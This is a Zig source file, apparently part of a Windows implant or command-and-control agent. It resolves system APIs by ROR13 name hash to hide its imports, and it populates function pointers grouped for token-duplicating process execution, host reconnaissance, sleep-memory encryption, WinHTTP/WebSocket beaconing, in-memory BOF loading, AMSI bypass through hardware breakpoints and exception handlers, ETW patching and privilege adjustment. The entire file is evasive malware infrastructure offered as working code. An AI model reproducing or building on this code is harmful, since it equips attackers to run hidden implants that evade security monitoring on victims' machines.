// Global function-pointer table, populated by ensure() via resolve.zig. // Type aliases in apitypes.zig. const win = @import("win32.zig"); const resolve = @import("resolve.zig"); const apitypes = @import("apitypes.zig"); pub const T_exec_CreatePipe = apitypes.T_exec_CreatePipe; pub const T_exec_CreateProcessA = apitypes.T_exec_CreateProcessA; pub const T_exec_ReadFile = apitypes.T_exec_ReadFile; pub const T_exec_WaitForSingleObject = apitypes.T_exec_WaitForSingleObject; pub const T_exec_GetExitCodeProcess = apitypes.T_exec_GetExitCodeProcess; pub const T_exec_GetLastError = apitypes.T_exec_GetLastError; pub const T_exec_GetModuleFileNameA = apitypes.T_exec_GetModuleFileNameA; pub const T_exec_ExitProcess = apitypes.T_exec_ExitProcess; pub const T_exec_InitializeProcThreadAttributeList = apitypes.T_exec_InitializeProcThreadAttributeList; pub const T_exec_UpdateProcThreadAttribute = apitypes.T_exec_UpdateProcThreadAttribute; pub const T_exec_DeleteProcThreadAttributeList = apitypes.T_exec_DeleteProcThreadAttributeList; pub const T_exec_CreateFileA = apitypes.T_exec_CreateFileA; pub const T_exec_WriteFile = apitypes.T_exec_WriteFile; pub const T_exec_OpenProcessToken = apitypes.T_exec_OpenProcessToken; pub const T_exec_DuplicateTokenEx = apitypes.T_exec_DuplicateTokenEx; pub const T_exec_CreateProcessWithTokenW = apitypes.T_exec_CreateProcessWithTokenW; pub const T_exec_CreatePseudoConsole = apitypes.T_exec_CreatePseudoConsole; pub const T_exec_ClosePseudoConsole = apitypes.T_exec_ClosePseudoConsole; pub const T_exec_CreateThread = apitypes.T_exec_CreateThread; pub const T_exec_InitializeCriticalSection = apitypes.T_exec_InitializeCriticalSection; pub const T_exec_EnterCriticalSection = apitypes.T_exec_EnterCriticalSection; pub const T_exec_LeaveCriticalSection = apitypes.T_exec_LeaveCriticalSection; pub const T_exec_DeleteCriticalSection = apitypes.T_exec_DeleteCriticalSection; pub const T_info_GetComputerNameA = apitypes.T_info_GetComputerNameA; pub const T_info_GetUserNameA = apitypes.T_info_GetUserNameA; pub const T_info_GetSystemInfo = apitypes.T_info_GetSystemInfo; pub const T_info_GetCurrentProcessId = apitypes.T_info_GetCurrentProcessId; pub const T_info_RtlGetVersion = apitypes.T_info_RtlGetVersion; pub const T_info_GetSystemTime = apitypes.T_info_GetSystemTime; pub const T_fiber_ConvertThreadToFiber = apitypes.T_fiber_ConvertThreadToFiber; pub const T_fiber_CreateFiber = apitypes.T_fiber_CreateFiber; pub const T_fiber_SwitchToFiber = apitypes.T_fiber_SwitchToFiber; pub const T_fiber_DeleteFiber = apitypes.T_fiber_DeleteFiber; pub const T_fiber_ConvertFiberToThread = apitypes.T_fiber_ConvertFiberToThread; pub const T_sleep_SystemFunction040 = apitypes.T_sleep_SystemFunction040; pub const T_sleep_SystemFunction041 = apitypes.T_sleep_SystemFunction041; pub const T_comms_LoadLibraryA = apitypes.T_comms_LoadLibraryA; pub const T_comms_WinHttpOpen = apitypes.T_comms_WinHttpOpen; pub const T_comms_WinHttpConnect = apitypes.T_comms_WinHttpConnect; pub const T_comms_WinHttpOpenRequest = apitypes.T_comms_WinHttpOpenRequest; pub const T_comms_WinHttpSetOption = apitypes.T_comms_WinHttpSetOption; pub const T_comms_WinHttpSendRequest = apitypes.T_comms_WinHttpSendRequest; pub const T_comms_WinHttpReceiveResponse = apitypes.T_comms_WinHttpReceiveResponse; pub const T_comms_WinHttpReadData = apitypes.T_comms_WinHttpReadData; pub const T_comms_WinHttpCloseHandle = apitypes.T_comms_WinHttpCloseHandle; pub const T_comms_WinHttpAddRequestHeaders = apitypes.T_comms_WinHttpAddRequestHeaders; pub const T_comms_WinHttpQueryDataAvailable = apitypes.T_comms_WinHttpQueryDataAvailable; pub const T_comms_WinHttpWebSocketCompleteUpgrade = apitypes.T_comms_WinHttpWebSocketCompleteUpgrade; pub const T_comms_WinHttpWebSocketSend = apitypes.T_comms_WinHttpWebSocketSend; pub const T_comms_WinHttpWebSocketReceive = apitypes.T_comms_WinHttpWebSocketReceive; pub const T_comms_WinHttpWebSocketClose = apitypes.T_comms_WinHttpWebSocketClose; pub const T_bof_LoadLibraryA = apitypes.T_bof_LoadLibraryA; pub const T_bof_GetProcAddress = apitypes.T_bof_GetProcAddress; pub const T_bof_GetModuleHandleA = apitypes.T_bof_GetModuleHandleA; pub const T_bof_VirtualAlloc = apitypes.T_bof_VirtualAlloc; pub const T_bof_VirtualFree = apitypes.T_bof_VirtualFree; pub const T_bof_VirtualProtect = apitypes.T_bof_VirtualProtect; pub const T_crypto_BCryptOpenAlgorithmProvider = apitypes.T_crypto_BCryptOpenAlgorithmProvider; pub const T_crypto_BCryptCloseAlgorithmProvider = apitypes.T_crypto_BCryptCloseAlgorithmProvider; pub const T_crypto_BCryptSetProperty = apitypes.T_crypto_BCryptSetProperty; pub const T_crypto_BCryptGenerateSymmetricKey = apitypes.T_crypto_BCryptGenerateSymmetricKey; pub const T_crypto_BCryptDestroyKey = apitypes.T_crypto_BCryptDestroyKey; pub const T_crypto_BCryptEncrypt = apitypes.T_crypto_BCryptEncrypt; pub const T_crypto_BCryptDecrypt = apitypes.T_crypto_BCryptDecrypt; pub const T_crypto_BCryptGenRandom = apitypes.T_crypto_BCryptGenRandom; pub const T_crypto_BCryptGenerateKeyPair = apitypes.T_crypto_BCryptGenerateKeyPair; pub const T_crypto_BCryptFinalizeKeyPair = apitypes.T_crypto_BCryptFinalizeKeyPair; pub const T_crypto_BCryptExportKey = apitypes.T_crypto_BCryptExportKey; pub const T_crypto_BCryptImportKeyPair = apitypes.T_crypto_BCryptImportKeyPair; pub const T_crypto_BCryptSecretAgreement = apitypes.T_crypto_BCryptSecretAgreement; pub const T_crypto_BCryptDeriveKey = apitypes.T_crypto_BCryptDeriveKey; pub const T_crypto_BCryptDestroySecret = apitypes.T_crypto_BCryptDestroySecret; pub const T_amsi_LoadLibraryW = apitypes.T_amsi_LoadLibraryW; pub const T_amsi_GetProcAddress = apitypes.T_amsi_GetProcAddress; pub const T_amsi_AddVectoredExceptionHandler = apitypes.T_amsi_AddVectoredExceptionHandler; pub const T_amsi_RemoveVectoredExceptionHandler = apitypes.T_amsi_RemoveVectoredExceptionHandler; pub const T_amsi_GetCurrentThread = apitypes.T_amsi_GetCurrentThread; pub const T_amsi_SetThreadContext = apitypes.T_amsi_SetThreadContext; pub const T_amsi_SuspendThread = apitypes.T_amsi_SuspendThread; pub const T_amsi_ResumeThread = apitypes.T_amsi_ResumeThread; pub const T_etw_GetModuleHandleW = apitypes.T_etw_GetModuleHandleW; pub const T_etw_GetProcAddress = apitypes.T_etw_GetProcAddress; pub const T_etw_VirtualProtect = apitypes.T_etw_VirtualProtect; pub const T_priv_LookupPrivilegeValueW = apitypes.T_priv_LookupPrivilegeValueW; pub const T_priv_AdjustTokenPrivileges = apitypes.T_priv_AdjustTokenPrivileges; pub const T_priv_GetCurrentProcess = apitypes.T_priv_GetCurrentProcess; pub const hash_ror13 = apitypes.hash_ror13; pub const resolve_api = apitypes.resolve_api; pub const get_module_by_hash = apitypes.get_module_by_hash; pub const get_func_by_hash = apitypes.get_func_by_hash; pub const NT_SUCCESS = apitypes.NT_SUCCESS; pub const BCRYPT_INIT_AUTH_MODE_INFO = apitypes.BCRYPT_INIT_AUTH_MODE_INFO; // Global function-pointer variables, populated by ensure() below. pub var exec_create_pipe: ?T_exec_CreatePipe = null; pub var exec_create_process_a: ?T_exec_CreateProcessA = null; pub var exec_read_file: ?T_exec_ReadFile = null; pub var exec_wait_for_single_object: ?T_exec_WaitForSingleObject = null; pub var exec_get_exit_code_process: ?T_exec_GetExitCodeProcess = null; pub var exec_get_last_error: ?T_exec_GetLastError = null; pub var exec_get_module_file_name_a: ?T_exec_GetModuleFileNameA = null; pub var exec_exit_process: ?T_exec_ExitProcess = null; pub var exec_initialize_proc_thread_attribute_list: ?T_exec_InitializeProcThreadAttributeList = null; pub var exec_update_proc_thread_attribute: ?T_exec_UpdateProcThreadAttribute = null; pub var exec_delete_proc_thread_attribute_list: ?T_exec_DeleteProcThreadAttributeList = null; pub var exec_create_file_a: ?T_exec_CreateFileA = null; pub var exec_write_file: ?T_exec_WriteFile = null; pub var exec_open_process_token: ?T_exec_OpenProcessToken = null; pub var exec_duplicate_token_ex: ?T_exec_DuplicateTokenEx = null; pub var exec_create_process_with_token_w: ?T_exec_CreateProcessWithTokenW = null; pub var exec_create_pseudo_console: ?T_exec_CreatePseudoConsole = null; pub var exec_close_pseudo_console: ?T_exec_ClosePseudoConsole = null; pub var exec_create_thread: ?T_exec_CreateThread = null; pub var exec_initialize_critical_section: ?T_exec_InitializeCriticalSection = null; pub var exec_enter_critical_section: ?T_exec_EnterCriticalSection = null; pub var exec_leave_critical_section: ?T_exec_LeaveCriticalSection = null; pub var exec_delete_critical_section: ?T_exec_DeleteCriticalSection = null; pub var info_get_computer_name_a: ?T_info_GetComputerNameA = null; pub var info_get_user_name_a: ?T_info_GetUserNameA = null; pub var info_get_system_info: ?T_info_GetSystemInfo = null; pub var info_get_current_process_id: ?T_info_GetCurrentProcessId = null; pub var info_rtl_get_version: ?T_info_RtlGetVersion = null; pub var info_get_system_time: ?T_info_GetSystemTime = null; pub var fiber_ConvertThreadToFiber: ?T_fiber_ConvertThreadToFiber = null; pub var fiber_CreateFiber: ?T_fiber_CreateFiber = null; pub var fiber_SwitchToFiber: ?T_fiber_SwitchToFiber = null; pub var fiber_DeleteFiber: ?T_fiber_DeleteFiber = null; pub var fiber_ConvertFiberToThread: ?T_fiber_ConvertFiberToThread = null; pub var sleep_SystemFunction040: ?T_sleep_SystemFunction040 = null; pub var sleep_SystemFunction041: ?T_sleep_SystemFunction041 = null; pub var comms_load_library_a: ?T_comms_LoadLibraryA = null; pub var comms_winhttp_open: ?T_comms_WinHttpOpen = null; pub var comms_winhttp_connect: ?T_comms_WinHttpConnect = null; pub var comms_winhttp_open_request: ?T_comms_WinHttpOpenRequest = null; pub var comms_winhttp_set_option: ?T_comms_WinHttpSetOption = null; pub var comms_winhttp_send_request: ?T_comms_WinHttpSendRequest = null; pub var comms_winhttp_receive_response: ?T_comms_WinHttpReceiveResponse = null; pub var comms_winhttp_read_data: ?T_comms_WinHttpReadData = null; pub var comms_winhttp_close_handle: ?T_comms_WinHttpCloseHandle = null; pub var comms_winhttp_add_request_headers: ?T_comms_WinHttpAddRequestHeaders = null; pub var comms_winhttp_query_data_available: ?T_comms_WinHttpQueryDataAvailable = null; pub var comms_winhttp_websocket_complete_upgrade: ?T_comms_WinHttpWebSocketCompleteUpgrade = null; pub var comms_winhttp_websocket_send: ?T_comms_WinHttpWebSocketSend = null; pub var comms_winhttp_websocket_receive: ?T_comms_WinHttpWebSocketReceive = null; pub var comms_winhttp_websocket_close: ?T_comms_WinHttpWebSocketClose = null; pub var bof_load_library_a: ?T_bof_LoadLibraryA = null; pub var bof_get_proc_address: ?T_bof_GetProcAddress = null; pub var bof_get_module_handle_a: ?T_bof_GetModuleHandleA = null; pub var bof_virtual_alloc: ?T_bof_VirtualAlloc = null; pub var bof_virtual_free: ?T_bof_VirtualFree = null; pub var bof_virtual_protect: ?T_bof_VirtualProtect = null; pub var crypto_bcrypt_open: ?T_crypto_BCryptOpenAlgorithmProvider = null; pub var crypto_bcrypt_close: ?T_crypto_BCryptCloseAlgorithmProvider = null; pub var crypto_bcrypt_set_prop: ?T_crypto_BCryptSetProperty = null; pub var crypto_bcrypt_gen_key: ?T_crypto_BCryptGenerateSymmetricKey = null; pub var crypto_bcrypt_destroy_key: ?T_crypto_BCryptDestroyKey = null; pub var crypto_bcrypt_encrypt: ?T_crypto_BCryptEncrypt = null; pub var crypto_bcrypt_decrypt: ?T_crypto_BCryptDecrypt = null; pub var crypto_bcrypt_gen_random: ?T_crypto_BCryptGenRandom = null; pub var crypto_bcrypt_gen_key_pair: ?T_crypto_BCryptGenerateKeyPair = null; pub var crypto_bcrypt_finalize_key_pair: ?T_crypto_BCryptFinalizeKeyPair = null; pub var crypto_bcrypt_export_key: ?T_crypto_BCryptExportKey = null; pub var crypto_bcrypt_import_key_pair: ?T_crypto_BCryptImportKeyPair = null; pub var crypto_bcrypt_secret_agreement: ?T_crypto_BCryptSecretAgreement = null; pub var crypto_bcrypt_derive_key: ?T_crypto_BCryptDeriveKey = null; pub var crypto_bcrypt_destroy_secret: ?T_crypto_BCryptDestroySecret = null; pub var amsi_load_library_w: ?T_amsi_LoadLibraryW = null; pub var amsi_get_proc_address: ?T_amsi_GetProcAddress = null; pub var amsi_add_vectored_exception_handler: ?T_amsi_AddVectoredExceptionHandler = null; pub var amsi_remove_vectored_exception_handler: ?T_amsi_RemoveVectoredExceptionHandler = null; pub var amsi_get_current_thread: ?T_amsi_GetCurrentThread = null; pub var amsi_set_thread_context: ?T_amsi_SetThreadContext = null; pub var amsi_suspend_thread: ?T_amsi_SuspendThread = null; pub var amsi_resume_thread: ?T_amsi_ResumeThread = null; pub var etw_get_module_handle_w: ?T_etw_GetModuleHandleW = null; pub var etw_get_proc_address: ?T_etw_GetProcAddress = null; pub var etw_virtual_protect: ?T_etw_VirtualProtect = null; // HWBP reuses AMSI's VEH/thread APIs. pub var hwbp_add_veh: ?*const fn (first: win.ULONG, handler: *const fn (*win.EXCEPTION_POINTERS) callconv(win.WINAPI) win.LONG) callconv(win.WINAPI) ?*anyopaque = null; pub var hwbp_get_thread: ?*const fn () callconv(win.WINAPI) win.HANDLE = null; pub var hwbp_set_thread_ctx: ?*const fn (win.HANDLE, *const win.CONTEXT) callconv(win.WINAPI) win.BOOL = null; pub var priv_lookup_privilege_value_w: ?T_priv_LookupPrivilegeValueW = null; pub var priv_adjust_token_privileges: ?T_priv_AdjustTokenPrivileges = null; pub var priv_get_current_process: ?T_priv_GetCurrentProcess = null; var g_ensure_done: bool = false; pub fn ensure() void { if (g_ensure_done) return; g_ensure_done = true; const k32_hash = hash_ror13("kernel32.dll"); const ntdll_hash = hash_ror13("ntdll.dll"); const winhttp_hash = hash_ror13("winhttp.dll"); const bcrypt_hash = hash_ror13("bcrypt.dll"); if (exec_create_pipe == null) { if (resolve.resolve_api(k32_hash, hash_ror13("CreatePipe"))) |p| { exec_create_pipe = @ptrCast(p); } } if (exec_create_process_a == null) { if (resolve.resolve_api(k32_hash, hash_ror13("CreateProcessA"))) |p| { exec_create_process_a = @ptrCast(p); } } if (exec_read_file == null) { if (resolve.resolve_api(k32_hash, hash_ror13("ReadFile"))) |p| { exec_read_file = @ptrCast(p); } } if (exec_wait_for_single_object == null) { if (resolve.resolve_api(k32_hash, hash_ror13("WaitForSingleObject"))) |p| { exec_wait_for_single_object = @ptrCast(p); } } if (exec_get_exit_code_process == null) { if (resolve.resolve_api(k32_hash, hash_ror13("GetExitCodeProcess"))) |p| { exec_get_exit_code_process = @ptrCast(p); } } if (exec_get_last_error == null) { if (resolve.resolve_api(k32_hash, hash_ror13("GetLastError"))) |p| { exec_get_last_error = @ptrCast(p); } } if (exec_get_module_file_name_a == null) { if (resolve.resolve_api(k32_hash, hash_ror13("GetModuleFileNameA"))) |p| { exec_get_module_file_name_a = @ptrCast(p); } } if (exec_exit_process == null) { if (resolve.resolve_api(k32_hash, hash_ror13("ExitProcess"))) |p| { exec_exit_process = @ptrCast(p); } } if (exec_initialize_proc_thread_attribute_list == null) { if (resolve.resolve_api(k32_hash, hash_ror13("InitializeProcThreadAttributeList"))) |p| { exec_initialize_proc_thread_attribute_list = @ptrCast(p); } } if (exec_update_proc_thread_attribute == null) { if (resolve.resolve_api(k32_hash, hash_ror13("UpdateProcThreadAttribute"))) |p| { exec_update_proc_thread_attribute = @ptrCast(p); } } if (exec_delete_proc_thread_attribute_list == null) { if (resolve.resolve_api(k32_hash, hash_ror13("DeleteProcThreadAttributeList"))) |p| { exec_delete_proc_thread_attribute_list = @ptrCast(p); } } if (exec_create_file_a == null) { if (resolve.resolve_api(k32_hash, hash_ror13("CreateFileA"))) |p| { exec_create_file_a = @ptrCast(p); } } if (exec_write_file == null) { if (resolve.resolve_api(k32_hash, hash_ror13("WriteFile"))) |p| { exec_write_file = @ptrCast(p); } } if (exec_open_process_token == null) { if (resolve.resolve_api(k32_hash, hash_ror13("OpenProcessToken"))) |p| { exec_open_process_token = @ptrCast(p); } } if (exec_duplicate_token_ex == null) { if (resolve.resolve_api(k32_hash, hash_ror13("DuplicateTokenEx"))) |p| { exec_duplicate_token_ex = @ptrCast(p); } } if (exec_create_process_with_token_w == null) { if (resolve.resolve_api(k32_hash, hash_ror13("CreateProcessWithTokenW"))) |p| { exec_create_process_with_token_w = @ptrCast(p); } } if (exec_create_pseudo_console == null) { if (resolve.resolve_api(k32_hash, hash_ror13("CreatePseudoConsole"))) |p| { exec_create_pseudo_console = @ptrCast(p); } } if (exec_close_pseudo_console == null) { if (resolve.resolve_api(k32_hash, hash_ror13("ClosePseudoConsole"))) |p| { exec_close_pseudo_console = @ptrCast(p); } } if (exec_create_thread == null) { if (resolve.resolve_api(k32_hash, hash_ror13("CreateThread"))) |p| { exec_create_thread = @ptrCast(p); } } if (exec_initialize_critical_section == null) { if (resolve.resolve_api(k32_hash, hash_ror13("InitializeCriticalSection"))) |p| { exec_initialize_critical_section = @ptrCast(p); } } if (exec_enter_critical_section == null) { if (resolve.resolve_api(k32_hash, hash_ror13("EnterCriticalSection"))) |p| { exec_enter_critical_section = @ptrCast(p); } } if (exec_leave_critical_section == null) { if (resolve.resolve_api(k32_hash, hash_ror13("LeaveCriticalSection"))) |p| { exec_leave_critical_section = @ptrCast(p); } } if (exec_delete_critical_section == null) { if (resolve.resolve_api(k32_hash, hash_ror13("DeleteCriticalSection"))) |p| { exec_delete_critical_section = @ptrCast(p); } } if (comms_load_library_a == null) { if (resolve.resolve_api(k32_hash, hash_ror13("LoadLibraryA"))) |p| { comms_load_library_a = @ptrCast(p); bof_load_library_a = @ptrCast(p); } } if (info_get_computer_name_a == null) { if (resolve.resolve_api(k32_hash, hash_ror13("GetComputerNameA"))) |p| { info_get_computer_name_a = @ptrCast(p); } } if (info_get_user_name_a == null) { if (comms_load_library_a) |la| { _ = la("advapi32.dll"); } if (resolve.resolve_api(k32_hash, hash_ror13("GetUserNameA"))) |p| { info_get_user_name_a = @ptrCast(p); } } if (info_get_system_info == null) { if (resolve.resolve_api(k32_hash, hash_ror13("GetSystemInfo"))) |p| { info_get_system_info = @ptrCast(p); } } if (info_get_current_process_id == null) { if (resolve.resolve_api(k32_hash, hash_ror13("GetCurrentProcessId"))) |p| { info_get_current_process_id = @ptrCast(p); } } if (info_get_system_time == null) { if (resolve.resolve_api(k32_hash, hash_ror13("GetSystemTime"))) |p| { info_get_system_time = @ptrCast(p); } } if (fiber_ConvertThreadToFiber == null) { if (resolve.resolve_api(k32_hash, hash_ror13("ConvertThreadToFiber"))) |p| { fiber_ConvertThreadToFiber = @ptrCast(p); } } if (fiber_CreateFiber == null) { if (resolve.resolve_api(k32_hash, hash_ror13("CreateFiber"))) |p| { fiber_CreateFiber = @ptrCast(p); } } if (fiber_SwitchToFiber == null) { if (resolve.resolve_api(k32_hash, hash_ror13("SwitchToFiber"))) |p| { fiber_SwitchToFiber = @ptrCast(p); } } if (fiber_DeleteFiber == null) { if (resolve.resolve_api(k32_hash, hash_ror13("DeleteFiber"))) |p| { fiber_DeleteFiber = @ptrCast(p); } } if (fiber_ConvertFiberToThread == null) { if (resolve.resolve_api(k32_hash, hash_ror13("ConvertFiberToThread"))) |p| { fiber_ConvertFiberToThread = @ptrCast(p); } } if (amsi_load_library_w == null) { if (resolve.resolve_api(k32_hash, hash_ror13("LoadLibraryW"))) |p| amsi_load_library_w = @ptrCast(p); } if (etw_get_module_handle_w == null) { if (resolve.resolve_api(k32_hash, hash_ror13("GetModuleHandleW"))) |p| etw_get_module_handle_w = @ptrCast(p); } if (bof_get_proc_address == null) { if (resolve.resolve_api(k32_hash, hash_ror13("GetProcAddress"))) |p| { bof_get_proc_address = @ptrCast(p); amsi_get_proc_address = @ptrCast(p); etw_get_proc_address = @ptrCast(p); } } if (bof_get_module_handle_a == null) { if (resolve.resolve_api(k32_hash, hash_ror13("GetModuleHandleA"))) |p| bof_get_module_handle_a = @ptrCast(p); } if (bof_virtual_alloc == null) { if (resolve.resolve_api(k32_hash, hash_ror13("VirtualAlloc"))) |p| bof_virtual_alloc = @ptrCast(p); } if (bof_virtual_free == null) { if (resolve.resolve_api(k32_hash, hash_ror13("VirtualFree"))) |p| bof_virtual_free = @ptrCast(p); } if (amsi_add_vectored_exception_handler == null) { if (resolve.resolve_api(k32_hash, hash_ror13("AddVectoredExceptionHandler"))) |p| amsi_add_vectored_exception_handler = @ptrCast(p); } if (amsi_remove_vectored_exception_handler == null) { if (resolve.resolve_api(k32_hash, hash_ror13("RemoveVectoredExceptionHandler"))) |p| amsi_remove_vectored_exception_handler = @ptrCast(p); } if (amsi_get_current_thread == null) { if (resolve.resolve_api(k32_hash, hash_ror13("GetCurrentThread"))) |p| amsi_get_current_thread = @ptrCast(p); } if (amsi_set_thread_context == null) { if (resolve.resolve_api(k32_hash, hash_ror13("SetThreadContext"))) |p| amsi_set_thread_context = @ptrCast(p); } if (amsi_suspend_thread == null) { if (resolve.resolve_api(k32_hash, hash_ror13("SuspendThread"))) |p| amsi_suspend_thread = @ptrCast(p); } if (amsi_resume_thread == null) { if (resolve.resolve_api(k32_hash, hash_ror13("ResumeThread"))) |p| amsi_resume_thread = @ptrCast(p); } // HWBP globals, same APIs as AMSI. if (hwbp_add_veh == null) hwbp_add_veh = amsi_add_vectored_exception_handler; if (hwbp_get_thread == null) hwbp_get_thread = amsi_get_current_thread; if (hwbp_set_thread_ctx == null) hwbp_set_thread_ctx = amsi_set_thread_context; if (info_rtl_get_version == null) { if (resolve.resolve_api(ntdll_hash, hash_ror13("RtlGetVersion"))) |p| info_rtl_get_version = @ptrCast(p); } if (sleep_SystemFunction040 == null) { const advapi_hash = hash_ror13("advapi32.dll"); _ = resolve.get_module_by_hash(advapi_hash); if (resolve.resolve_api(advapi_hash, hash_ror13("SystemFunction040"))) |p| sleep_SystemFunction040 = @ptrCast(p); if (resolve.resolve_api(advapi_hash, hash_ror13("SystemFunction041"))) |p| sleep_SystemFunction041 = @ptrCast(p); } if (comms_load_library_a != null and (comms_winhttp_open == null or comms_winhttp_connect == null or comms_winhttp_open_request == null or comms_winhttp_send_request == null or comms_winhttp_receive_response == null or comms_winhttp_read_data == null or comms_winhttp_websocket_complete_upgrade == null)) { _ = comms_load_library_a.?("winhttp.dll"); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpOpen"))) |p| comms_winhttp_open = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpConnect"))) |p| comms_winhttp_connect = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpOpenRequest"))) |p| comms_winhttp_open_request = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpSetOption"))) |p| comms_winhttp_set_option = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpSendRequest"))) |p| comms_winhttp_send_request = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpReceiveResponse"))) |p| comms_winhttp_receive_response = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpReadData"))) |p| comms_winhttp_read_data = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpCloseHandle"))) |p| comms_winhttp_close_handle = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpAddRequestHeaders"))) |p| comms_winhttp_add_request_headers = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpQueryDataAvailable"))) |p| comms_winhttp_query_data_available = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpWebSocketCompleteUpgrade"))) |p| comms_winhttp_websocket_complete_upgrade = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpWebSocketSend"))) |p| comms_winhttp_websocket_send = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpWebSocketReceive"))) |p| comms_winhttp_websocket_receive = @ptrCast(p); if (resolve.resolve_api(winhttp_hash, hash_ror13("WinHttpWebSocketClose"))) |p| comms_winhttp_websocket_close = @ptrCast(p); } // advapi32, LookupPrivilegeValueW, AdjustTokenPrivileges const advapi_hash = hash_ror13("advapi32.dll"); if (priv_get_current_process == null) { if (resolve.resolve_api(k32_hash, hash_ror13("GetCurrentProcess"))) |p| priv_get_current_process = @ptrCast(p); } if (priv_lookup_privilege_value_w == null or priv_adjust_token_privileges == null) { _ = resolve.get_module_by_hash(advapi_hash); if (resolve.resolve_api(advapi_hash, hash_ror13("LookupPrivilegeValueW"))) |p| priv_lookup_privilege_value_w = @ptrCast(p); if (resolve.resolve_api(advapi_hash, hash_ror13("AdjustTokenPrivileges"))) |p| priv_adjust_token_privileges = @ptrCast(p); } if (crypto_bcrypt_open == null) { if (resolve.get_module_by_hash(bcrypt_hash) == null) { if (comms_load_library_a) |la| _ = la("bcrypt.dll"); } if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptOpenAlgorithmProvider"))) |p| crypto_bcrypt_open = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptCloseAlgorithmProvider"))) |p| crypto_bcrypt_close = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptSetProperty"))) |p| crypto_bcrypt_set_prop = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptGenerateSymmetricKey"))) |p| crypto_bcrypt_gen_key = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptDestroyKey"))) |p| crypto_bcrypt_destroy_key = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptEncrypt"))) |p| crypto_bcrypt_encrypt = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptDecrypt"))) |p| crypto_bcrypt_decrypt = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptGenRandom"))) |p| crypto_bcrypt_gen_random = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptGenerateKeyPair"))) |p| crypto_bcrypt_gen_key_pair = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptFinalizeKeyPair"))) |p| crypto_bcrypt_finalize_key_pair = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptExportKey"))) |p| crypto_bcrypt_export_key = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptImportKeyPair"))) |p| crypto_bcrypt_import_key_pair = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptSecretAgreement"))) |p| crypto_bcrypt_secret_agreement = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptDeriveKey"))) |p| crypto_bcrypt_derive_key = @ptrCast(p); if (resolve.resolve_api(bcrypt_hash, hash_ror13("BCryptDestroySecret"))) |p| crypto_bcrypt_destroy_secret = @ptrCast(p); } }